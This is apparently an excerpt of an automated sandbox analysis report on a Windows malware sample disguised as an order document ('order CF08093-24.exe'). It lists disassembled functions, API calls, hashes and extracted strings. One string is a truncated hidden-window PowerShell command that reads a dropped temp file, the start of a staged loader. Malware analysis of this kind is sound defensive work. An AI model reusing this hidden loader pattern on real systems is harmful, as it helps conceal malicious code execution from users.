                                                                            • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                            • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                            • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                            • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                            Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                              • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                              • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                              • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                              • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                              • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                                                              • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                                                              • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2972824698-0
                                                                            • Opcode ID: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                                                            • Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
                                                                            • Opcode Fuzzy Hash: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                                                            • Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E

                                                                            Non-executed Functions

                                                                            Function 004049B1 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                                            • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                                              • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\order CF08093-24.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\order CF08093-24.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                              • Part of subcall function 004067EF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                            • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                                              • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                              • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                                              • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                            Strings
                                                                            • powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprm, xrefs: 004049CA
                                                                            • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 00404B01
                                                                            • : Completed, xrefs: 00404B12, 00404B17, 00404B22
                                                                            • A, xrefs: 00404AD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprm
                                                                            • API String ID: 2624150263-2851819861
                                                                            • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                            • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                                            • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                            • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                                            Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405C76
                                                                            • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405CBE
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405CE1
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405CE7
                                                                            • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405CF7
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                                            • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\order CF08093-24.exe", xrefs: 00405C56
                                                                            • \*.*, xrefs: 00405CB8
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\order CF08093-24.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-3890829713
                                                                            • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                            • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                                                            • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                            • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE
                                                                            Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes, xrefs: 0040228E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes
                                                                            • API String ID: 542301482-2464104712
                                                                            • Opcode ID: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                                                            • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                                                            • Opcode Fuzzy Hash: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                                                            • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                                            Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                            • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                                                            • Opcode Fuzzy Hash: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                            • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29
                                                                            Function 00404F2D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                                            • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                                            • DeleteObject.GDI32(00000000), ref: 00405027
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                                              • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                                            • ShowWindow.USER32(?,00000005), ref: 00405189
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00405357
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405367
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                                                            • ShowWindow.USER32(?,00000000), ref: 00405511
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                                            • ShowWindow.USER32(00000000), ref: 00405523
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 2564846305-813528018
                                                                            • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                            • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                                            • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                            • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                                            Function 0040467F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                                                            • GetSysColor.USER32(?), ref: 0040475F
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                                            • lstrlenW.KERNEL32(?), ref: 00404780
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                                            • SendMessageW.USER32(00000000), ref: 00404802
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                                            • SetCursor.USER32(00000000), ref: 00404881
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                                            • SetCursor.USER32(00000000), ref: 0040489D
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: : Completed$N
                                                                            • API String ID: 3103080414-2140067464
                                                                            • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                            • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                                            • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                            • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
